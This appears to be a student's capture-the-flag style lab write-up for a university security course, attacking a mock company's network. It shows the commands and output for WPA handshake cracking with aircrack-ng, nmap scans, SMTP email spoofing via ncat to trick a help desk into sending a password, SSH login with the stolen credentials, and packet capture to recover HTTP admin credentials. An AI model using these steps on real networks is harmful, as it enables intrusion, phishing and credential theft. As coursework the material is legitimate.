3. 

1. created a create_wordlist python program to generate wordlist
2. ran aircrack-ng cap.cap -w wordlist.txt from terminal

#  BSSID              ESSID                     Encryption

   1  98:DE:D0:78:F3:C3  SuperDuperSketchyCorp-eecs388  WPA (1 handshake, with PMKID)

      [00:00:01] 6888/46655 keys tested (4132.45 k/s) 

      Time left: 9 seconds                                      14.76%

                          KEY FOUND! [ EECS388-5bo ]


      Master Key     : 9B A2 B9 DB 44 EF 35 3E E7 FE 57 F8 A8 FA EE 0B 
                       94 AA E2 06 0B 41 DE 66 FC CB 03 D4 9F 41 A3 CF 

      Transient Key  : 24 93 4F 85 F4 67 04 80 8D 80 95 F3 1B 6F 70 21 
                       EF 3E 1F F4 AD 03 8B AA 29 59 B8 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 6F 8E A6 9A F8 D4 A3 9A 03 6F 9A 3E 6D A0 EA 96 


WIFI PASSWORD = EECS388-5bo


Wi-Fi is connected to SuperDuperSketchyCorp-eecs388 and has the IP address 192.168.0.75.



host superdupersketchycorp.com
superdupersketchycorp.com has address 141.212.108.230

PING email.superdupersketchycorp.com (141.212.108.230): 56 data bytes

nmap 141.212.108.230
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-22 13:51 EDT
Nmap scan report for superdupersketchycorp.eecs.umich.edu (141.212.108.230)
Host is up (0.0028s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
25/tcp open  smtp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.71 seconds

USED NETCAT TO SPOOF EMAIL

ncat -C 141.212.108.230 25
220 sdsc Python SMTP proxy version 0.2
HELO b
250 sdsc
MAIL FROM: jsschaf@email.superdupersketchycorp.com
250 Ok
RCPT TO: helpdesk@email.superdupersketchycorp.com
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
From: jsschaf@email.superdupersketchycorp.com
To: helpdesk@email.superdupersketchycorp.com                                                  
Reply-to: jsschaf@umich.edu               
Subject: Password

Hi I forgot my password can I please have it. 

221 Bye

GOT AN EMAIL REPLY:

 Username=jsschaf
 Password=Bbf2gHeb
        


FINDING WHICH PORT IS OPEN THAT WE CAN SSH INTO
nmap 192.168.0.0/24

Nmap scan report for 192.168.0.1
Host is up (0.028s latency).
Not shown: 995 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
23/tcp    open  telnet
80/tcp    open  http
1900/tcp  open  upnp
20005/tcp open  btx

Nmap scan report for 192.168.0.25
Host is up (0.054s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
80/tcp open  http

Nmap scan report for 192.168.0.255
Host is up (0.017s latency).
All 1000 scanned ports on 192.168.0.255 are closed

Nmap done: 256 IP addresses (3 hosts up) scanned in 32.07 seconds

SSH INTO ONE OF THE PORTS

ssh jsschaf@192.168.0.25 - p 22

jsschaf@192.168.0.25's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-1024-oem x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

159 packages can be updated.
13 updates are security updates.

*** System restart required ***
Last login: Tue Oct 23 22:15:08 2018 from 192.168.0.77

CHECKING FILES
ls
hash_cracking_bonus  OTP_bonus  tools  Welcome.txt

OPENING WELCOME.TXT
nano Welcome.txt
Hello New Employee!

Welcome to your first day on the job at SuperDuperSketchyCorp!

We have weekly security reading group at 12:30pm on Tuesdays in the stained
glass room on the 3rd floor of BBB. You are expected to read the weekly paper
before attending. You can sign up for the mailing list here:
https://mcommunity.umich.edu/#group:security-reading

We also have weekly Capture the Flag Club meetings from 4:30-6:00pm on Fridays
in BBB 3901. You can sign up for announcements related to the club here:
https://mcommunity.umich.edu/#group:Wolverine%20Capture%20The%20Flag%20Club

If you need to connect to this server from a university device instead of
through our wireless access point, you can ssh to this server at
superdupersketchycorp.com on tcp port 47923 and access the web server at
www.superdupersketchycorp.com. You will not be able to access the server
from outside the UM campus networks.

Welcome to the team. I'm sure you'll be very happy here.

Ben-nate Sprec, PhD
President
SuperDuperSketchyCorp



ifconfig
    eth0      Link encap:Ethernet  HWaddr 94:c6:91:19:bd:80
            inet addr:141.212.108.230  Bcast:141.212.108.255  Mask:255.255.255.0
            inet6 addr: 2607:f018:600:4:69f1:3167:118d:58f2/64 Scope:Global
            inet6 addr: 2607:f018:600:4:a014:2041:c2f0:c6bf/64 Scope:Global
            inet6 addr: 2607:f018:600:4:69f5:daeb:451a:3ec2/64 Scope:Global
            inet6 addr: 2607:f018:600:4:d31f:43a5:be7d:c0d9/64 Scope:Global
            inet6 addr: 2607:f018:600:4:49c7:8cd:cba:5b99/64 Scope:Global
            inet6 addr: fe80::2026:a0c4:b679:af0f/64 Scope:Link
            inet6 addr: 2607:f018:600:4:7815:aaca:33d0:ab60/64 Scope:Global
            inet6 addr: 2607:f018:600:4:3de1:e14:4fe8:80be/64 Scope:Global
            inet6 addr: 2607:f018:600:4:5080:4ed9:4763:f67f/64 Scope:Global
            UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
            RX packets:22988772 errors:0 dropped:0 overruns:0 frame:0
            TX packets:5077228 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:1000
            RX bytes:4369820964 (4.3 GB)  TX bytes:3182739772 (3.1 GB)
            Interrupt:16 Memory:dc300000-dc320000

    lo        Link encap:Local Loopback
            inet addr:127.0.0.1  Mask:255.0.0.0
            inet6 addr: ::1/128 Scope:Host
            UP LOOPBACK RUNNING  MTU:65536  Metric:1
            RX packets:5944792 errors:0 dropped:0 overruns:0 frame:0
            TX packets:5944792 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:1000
            RX bytes:24473654629 (24.4 GB)  TX bytes:24473654629 (24.4 GB)

    wlan0     Link encap:Ethernet  HWaddr 00:19:d2:f5:66:26
            inet addr:35.0.28.235  Bcast:35.0.31.255  Mask:255.255.240.0
            inet6 addr: fe80::6563:b5d7:c5f3:86c7/64 Scope:Link
            UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
            RX packets:5115025 errors:0 dropped:0 overruns:0 frame:0
            TX packets:1996973 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:1000
            RX bytes:410061479 (410.0 MB)  TX bytes:633022207 (633.0 MB)

FINDING ADMIN CREDENTIALS
tcpdump -G 90 -W 1 -i wlan0 -w cap.pcap
    tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes
    Maximum file limit reached: 1
    45490 packets captured
    45669 packets received by filter
    0 packets dropped by kernel

SCP FILE BACK TO LOCAL ADDRESS
scp -P 47923 kerrywu@superdupersketchycorp.com:/home/kerrywu/tools/cap.pcap /mnt/c/Users/kerry/Desktop

OPEN IN WIRESHARK

FIND HTTP PROTOCOLS WHERE INFO HAS Ok

CHECK PREVIOUS GET REQUEST
Hypertext Transfer Protocol -> Authorization
Credentials: mattley:388roxmysocks

LOGGING INTO ADMIN PAGE
    Announcements
    Layoffs are coming!
    Just letting the exec's know, we'll be laying off 30% of the workforce come March. Be sure not to tell the employees until it's time. If this got out, our quarterly projections would drop.

    Remote Office Work now possible
    We're setting up a remote office in the Bob and Betty Beyster building at the University of Michigan.

    The password to the executive lounge has changed.
    Please use 'h4ppie8rthDay'.


FINDINGS:
1. Wifi Password
2. Open Port 22 on 192.168.0.25
3/4. Login Credentials
    jsschaf     Bbf2gHeb
    kerrywu     RDU4MGBv
5. Admin Credentials 
    mattley     388roxmysocks
6. Secret
    30% layoffs
